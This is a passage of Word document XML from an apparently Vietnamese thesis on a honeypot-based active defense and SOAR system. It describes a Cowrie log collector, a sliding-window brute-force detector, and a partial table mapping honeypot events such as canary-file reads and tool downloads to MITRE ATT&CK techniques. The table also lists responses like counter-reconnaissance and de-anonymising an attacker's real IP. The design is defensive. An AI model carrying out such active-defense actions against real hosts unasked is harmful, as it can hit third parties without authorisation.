          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 3.1: Sơ đồ kiến trúc tổng thể 5 phân lớp của Hệ sinh thái Active Defense &amp; SOAR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.2 Thiết kế Tầng Thu thập &amp; Streaming Sự kiện thời gian thực (Cowrie Event Collector)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong môi trường tác chiến thực tế, một đợt tấn công brute-force có thể tạo ra hàng trăm lượt đăng nhập mỗi giây. Nếu đọc log theo kiểu tuần tự (Polling/Batch), hệ thống sẽ gặp phải độ trễ lớn và tiêu tốn bộ nhớ I/O. Phân hệ Event Collector được thiết kế theo cơ chế Non-blocking Asynchronous Stream:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Cơ chế Quản lý Con trỏ Tệp tin (File Pointer Tracking): Module duy trì vị trí con trỏ cuối cùng (offset seek) của file 'cowrie.json'. Khi có dòng log mới được Cowrie ghi xuống đĩa, tiến trình chỉ đọc chính xác phần dung lượng mới sinh ra mà không cần nạp lại toàn bộ file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Bộ đệm &amp; Lọc Nhiễu (Filter &amp; Sanitize): Chuyển đổi định dạng chuỗi JSON thô thành đối tượng Python Dictionary có cấu trúc, kiểm tra tính toàn vẹn của gói tin và bỏ qua các bản ghi bị phân mảnh hoặc lỗi cú pháp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Cơ chế Tự phục hồi Kết nối (Self-healing &amp; Log Rotation): Khi file log bị hệ điều hành xoay vòng (Logrotate) hoặc khi dịch vụ Cowrie khởi động lại, Event Collector tự động phát hiện sự thay đổi Inode của file và mở lại luồng lắng nghe mà không làm gián đoạn hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.3 Thiết kế Động cơ Tương quan Sự kiện và Ánh xạ MITRE ATT&amp;CK (Correlation Engine)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Động cơ Tương quan Sự kiện (Correlation Engine) là linh hồn kỹ thuật của đồ án, chịu trách nhiệm chuyển hóa các dòng log kỹ thuật rời rạc thành các Cảnh báo An ninh Có ý nghĩa (Actionable Security Alerts). Thuật toán hoạt động dựa trên nguyên lý Cửa sổ Thời gian Trượt (Sliding Time Window):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Gọi W là độ rộng của cửa sổ thời gian (mặc định W = 60 giây) và T là ngưỡng số lần đăng nhập thất bại tối đa cho phép (mặc định T = 5 lần). Với mỗi địa chỉ IP nguồn S_ip gửi sự kiện 'cowrie.login.failed' tại thời điểm t_now, thuật toán thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 1: Lấy danh sách lịch sử các mốc thời gian thất bại của S_ip: L = {t_1, t_2, ..., t_k}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 2: Loại bỏ toàn bộ các mốc thời gian đã trượt ra ngoài cửa sổ thời gian: L' = {t ∈ L | t_now - t ≤ W}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 3: Thêm t_now vào L'. Nếu kích thước |L'| ≥ T, lập tức kích hoạt Cảnh báo Tấn công Dò quét Mật khẩu diện rộng (MITRE T1110.001) và xóa danh sách L' để ngăn chặn hiện tượng spam cảnh báo liên tục.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bên cạnh đó, Correlation Engine tự động phân loại các sự kiện đặc biệt khác và ánh xạ vào ma trận MITRE ATT&amp;CK được mô tả chi tiết trong Bảng 3.1 dưới đây:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 3.1: Bảng ánh xạ các Sự kiện Cowrie sang Ma trận Kỹ thuật MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mã Sự kiện Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kỹ thuật MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tên Kỹ thuật Chuẩn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mức độ Nguy hại</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Hành động SOAR Khuyến nghị</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>cowrie.login.failed (đạt ngưỡng)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1110.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Brute Force: Password Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tarpit giam lỏng + Chặn Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>cowrie.login.success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Valid Accounts: Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Trinh sát ngược tức thì + Kích hoạt bẫy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>cowrie.command.input (uname, whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1082</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ghi nhật ký telemetry + Giám sát phiên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>cowrie.command.input (đọc canary file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1552.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Unsecured Credentials In Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Khử ẩn danh Real IP + Cô lập phiên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>cowrie.session.file_download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
